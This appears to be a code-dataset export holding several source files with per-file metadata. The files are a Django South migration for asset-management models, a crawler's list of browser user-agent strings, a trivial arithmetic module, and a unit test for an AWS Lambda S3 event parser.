'model': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.AssetModel']", 'on_delete': 'models.PROTECT'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'niw': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'office_info': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['ralph_assets.OfficeInfo']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'order_no': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'part_info': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['ralph_assets.PartInfo']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '10', 'decimal_places': '2'}),
'production_use_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'provider_order_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'remarks': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}),
'request_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'slots': ('django.db.models.fields.FloatField', [], {'default': '0', 'max_length': '64'}),
'sn': ('django.db.models.fields.CharField', [], {'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '1'}),
'support_period': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'support_price': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}),
'support_type': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'support_void_reporting': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'db_index': 'True'}),
'type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'warehouse': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.Warehouse']", 'on_delete': 'models.PROTECT'})
},
'ralph_assets.assetcategory': {
'Meta': {'object_name': 'AssetCategory'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_blade': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "u'children'", 'null': 'True', 'to': "orm['ralph_assets.AssetCategory']"}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {})
},
'ralph_assets.assethistorychange': {
'Meta': {'object_name': 'AssetHistoryChange'},
'asset': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_assets.Asset']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'device_info': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_assets.DeviceInfo']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'field_name': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '64'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'new_value': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
'office_info': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_assets.OfficeInfo']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'old_value': ('django.db.models.fields.CharField', [], {'default': "u''", 'max_length': '255'}),
'part_info': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['ralph_assets.PartInfo']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'})
},
'ralph_assets.assetmanufacturer': {
'Meta': {'object_name': 'AssetManufacturer'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'ralph_assets.assetmodel': {
'Meta': {'object_name': 'AssetModel'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'manufacturer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.AssetManufacturer']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'ralph_assets.deviceinfo': {
'Meta': {'object_name': 'DeviceInfo'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'rack': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'ralph_device_id': ('django.db.models.fields.IntegerField', [], {'default': 'None', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'u_height': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'u_level': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'})
},
'ralph_assets.officeinfo': {
'Meta': {'object_name': 'OfficeInfo'},
'attachment': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_last_inventory': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_logged_user': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'license_key': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'license_type': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'version': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'})
},
'ralph_assets.partinfo': {
'Meta': {'object_name': 'PartInfo'},
'barcode_salvaged': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'device': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'device'", 'null': 'True', 'to': "orm['ralph_assets.Asset']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'source_device': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "u'source_device'", 'null': 'True', 'to': "orm['ralph_assets.Asset']"})
},
'ralph_assets.warehouse': {
'Meta': {'object_name': 'Warehouse'},
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'modified_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'+'", 'on_delete': 'models.SET_NULL', 'default': 'None', 'to': "orm['account.Profile']", 'blank': 'True', 'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'ralph_assets.licence': {
'Meta': {'object_name': 'Licence'},
'accounting_id': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'asset_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'bought_date': ('django.db.models.fields.DateField', [], {}),
'cache_version': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'licence_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.LicenceType']", 'on_delete': 'models.PROTECT'}),
'manufacturer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.AssetManufacturer']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'niw': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'number_bought': ('django.db.models.fields.IntegerField', [], {}),
'order_no': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'parent': ('mptt.fields.TreeForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['ralph_assets.Licence']"}),
'price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '10', 'decimal_places': '2'}),
'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'sn': ('django.db.models.fields.CharField', [], {'max_length': '200', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'software_category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['ralph_assets.SoftwareCategory']", 'on_delete': 'models.PROTECT'}),
'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'used': ('django.db.models.fields.IntegerField', [], {}),
'valid_thru': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
},
'ralph_assets.licencetype': {
'Meta': {'object_name': 'LicenceType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
'ralph_assets.softwarecategory': {
'Meta': {'object_name': 'SoftwareCategory'},
'asset_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '75', 'db_index': 'True'})
},
}
complete_apps = ['ralph_assets']
| 94.927419
| 224
| 0.574038
| 2,413
| 23,542
| 5.474927
| 0.089101
| 0.104156
| 0.181213
| 0.258875
| 0.833699
| 0.803648
| 0.751798
| 0.702066
| 0.660889
| 0.577095
| 0
| 0.007302
| 0.173902
| 23,542
| 247
| 225
| 95.311741
| 0.671997
| 0.00429
| 0
| 0.34874
| 0
| 0
| 0.608525
| 0.348765
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008403
| false
| 0.004202
| 0.016807
| 0
| 0.037815
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc9aa46dc79d398e8f8e9180170d36d6c02742b8
| 6,139
|
py
|
Python
|
feapder/network/user_agent.py
|
jsntzxh/feapder
|
dd192393ae7ef63a00e7dec09900901f846fb67d
|
[
"MIT"
] | 1
|
2021-07-13T02:07:10.000Z
|
2021-07-13T02:07:10.000Z
|
feapder/network/user_agent.py
|
jsntzxh/feapder
|
dd192393ae7ef63a00e7dec09900901f846fb67d
|
[
"MIT"
] | null | null | null |
feapder/network/user_agent.py
|
jsntzxh/feapder
|
dd192393ae7ef63a00e7dec09900901f846fb67d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on 2016-12-28 17:55
---------
@summary:
---------
@author: Boris
@email: boris_liu@foxmail.com
"""
import random
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36",
"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36",
"Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.517 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1623.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36",
"Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.2 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1467.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1500.55 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.90 Safari/537.36",
"Mozilla/5.0 (X11; NetBSD) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
"Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.60 Safari/537.17",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1309.0 Safari/537.17",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.15 (KHTML, like Gecko) Chrome/24.0.1295.0 Safari/537.15",
"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.14 (KHTML, like Gecko) Chrome/24.0.1292.0 Safari/537.14",
]
def get():
return random.choice(USER_AGENTS)
| 87.7
| 148
| 0.697671
| 1,167
| 6,139
| 3.648672
| 0.120823
| 0.106858
| 0.107797
| 0.234852
| 0.895021
| 0.895021
| 0.879051
| 0.867543
| 0.856505
| 0.790512
| 0
| 0.238702
| 0.131292
| 6,139
| 69
| 149
| 88.971014
| 0.559722
| 0.020362
| 0
| 0
| 0
| 0.910714
| 0.917582
| 0.003497
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017857
| false
| 0
| 0.017857
| 0.017857
| 0.053571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
5d77d3b0b614b447a3c3c087bacc901968beb582
| 114
|
py
|
Python
|
calc.py
|
hmiyake/my-test-repo-old
|
3c6b365861e69a0acd202ee9f520311a98810059
|
[
"MIT"
] | null | null | null |
calc.py
|
hmiyake/my-test-repo-old
|
3c6b365861e69a0acd202ee9f520311a98810059
|
[
"MIT"
] | 1
|
2021-08-04T02:33:32.000Z
|
2021-08-04T02:33:51.000Z
|
calc.py
|
hmiyake/my-test-repo-old
|
3c6b365861e69a0acd202ee9f520311a98810059
|
[
"MIT"
] | null | null | null |
#!/bin/env python
def calc_wa(val1, val2):
return val1 + val2
def calc_wari(val1, val2):
return val1 / val2
| 14.25
| 26
| 0.684211
| 19
| 114
| 4
| 0.526316
| 0.421053
| 0.368421
| 0.473684
| 0.578947
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 0.192982
| 114
| 7
| 27
| 16.285714
| 0.73913
| 0.140351
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
5d8a19a933e395c4b26816e27c4fefc1e9eef227
| 3,956
|
py
|
Python
|
tests/functional/parser/test_s3.py
|
Sordie/aws-lambda-powertools-python
|
12c512b78b8830bf2ed09e35d640df14afacfc1a
|
[
"Apache-2.0"
] | 1
|
2021-02-19T14:02:56.000Z
|
2021-02-19T14:02:56.000Z
|
tests/functional/parser/test_s3.py
|
Sordie/aws-lambda-powertools-python
|
12c512b78b8830bf2ed09e35d640df14afacfc1a
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/parser/test_s3.py
|
Sordie/aws-lambda-powertools-python
|
12c512b78b8830bf2ed09e35d640df14afacfc1a
|
[
"Apache-2.0"
] | null | null | null |
from aws_lambda_powertools.utilities.parser import event_parser
from aws_lambda_powertools.utilities.parser.models import S3Model, S3RecordModel
from aws_lambda_powertools.utilities.typing import LambdaContext
from tests.functional.parser.utils import load_event
@event_parser(model=S3Model)
def handle_s3(event: S3Model, _: LambdaContext):
records = list(event.Records)
assert len(records) == 1
record: S3RecordModel = records[0]
assert record.eventVersion == "2.1"
assert record.eventSource == "aws:s3"
assert record.awsRegion == "us-east-2"
convert_time = int(round(record.eventTime.timestamp() * 1000))
assert convert_time == 1567539447192
assert record.eventName == "ObjectCreated:Put"
user_identity = record.userIdentity
assert user_identity.principalId == "AWS:AIDAINPONIXQXHT3IKHL2"
request_parameters = record.requestParameters
assert str(request_parameters.sourceIPAddress) == "205.255.255.255/32"
assert record.responseElements.x_amz_request_id == "D82B88E5F771F645"
assert (
record.responseElements.x_amz_id_2
== "vlR7PnpV2Ce81l0PRw6jlUpck7Jo5ZsQjryTjKlc5aLWGVHPZLj5NeC6qMa0emYBDXOo6QBU0Wo="
)
s3 = record.s3
assert s3.s3SchemaVersion == "1.0"
assert s3.configurationId == "828aa6fc-f7b5-4305-8584-487c791949c1"
bucket = s3.bucket
assert bucket.name == "lambda-artifacts-deafc19498e3f2df"
assert bucket.ownerIdentity.principalId == "A3I5XTEXAMAI3E"
assert bucket.arn == "arn:aws:s3:::lambda-artifacts-deafc19498e3f2df"
assert s3.object.key == "b21b84d653bb07b05b1e6b33684dc11b"
assert s3.object.size == 1305107
assert s3.object.eTag == "b21b84d653bb07b05b1e6b33684dc11b"
assert s3.object.versionId is None
assert s3.object.sequencer == "0C0F6F405D6ED209E1"
assert record.glacierEventData is None
@event_parser(model=S3Model)
def handle_s3_glacier(event: S3Model, _: LambdaContext):
records = list(event.Records)
assert len(records) == 1
record: S3RecordModel = records[0]
assert record.eventVersion == "2.1"
assert record.eventSource == "aws:s3"
assert record.awsRegion == "us-east-2"
convert_time = int(round(record.eventTime.timestamp() * 1000))
assert convert_time == 1567539447192
assert record.eventName == "ObjectCreated:Put"
user_identity = record.userIdentity
assert user_identity.principalId == "AWS:AIDAINPONIXQXHT3IKHL2"
request_parameters = record.requestParameters
assert str(request_parameters.sourceIPAddress) == "205.255.255.255/32"
assert record.responseElements.x_amz_request_id == "D82B88E5F771F645"
assert (
record.responseElements.x_amz_id_2
== "vlR7PnpV2Ce81l0PRw6jlUpck7Jo5ZsQjryTjKlc5aLWGVHPZLj5NeC6qMa0emYBDXOo6QBU0Wo="
)
s3 = record.s3
assert s3.s3SchemaVersion == "1.0"
assert s3.configurationId == "828aa6fc-f7b5-4305-8584-487c791949c1"
bucket = s3.bucket
assert bucket.name == "lambda-artifacts-deafc19498e3f2df"
assert bucket.ownerIdentity.principalId == "A3I5XTEXAMAI3E"
assert bucket.arn == "arn:aws:s3:::lambda-artifacts-deafc19498e3f2df"
assert s3.object.key == "b21b84d653bb07b05b1e6b33684dc11b"
assert s3.object.size == 1305107
assert s3.object.eTag == "b21b84d653bb07b05b1e6b33684dc11b"
assert s3.object.versionId is None
assert s3.object.sequencer == "0C0F6F405D6ED209E1"
assert record.glacierEventData is not None
convert_time = int(
round(record.glacierEventData.restoreEventData.lifecycleRestorationExpiryTime.timestamp() * 1000)
)
assert convert_time == 60000
assert record.glacierEventData.restoreEventData.lifecycleRestoreStorageClass == "standard"
def test_s3_trigger_event():
event_dict = load_event("s3Event.json")
handle_s3(event_dict, LambdaContext())
def test_s3_glacier_trigger_event():
event_dict = load_event("s3EventGlacier.json")
handle_s3_glacier(event_dict, LambdaContext())
| 43.955556
| 105
| 0.752528
| 421
| 3,956
| 6.935867
| 0.244656
| 0.061644
| 0.047945
| 0.039726
| 0.861301
| 0.831507
| 0.784932
| 0.761644
| 0.761644
| 0.761644
| 0
| 0.113224
| 0.149393
| 3,956
| 89
| 106
| 44.449438
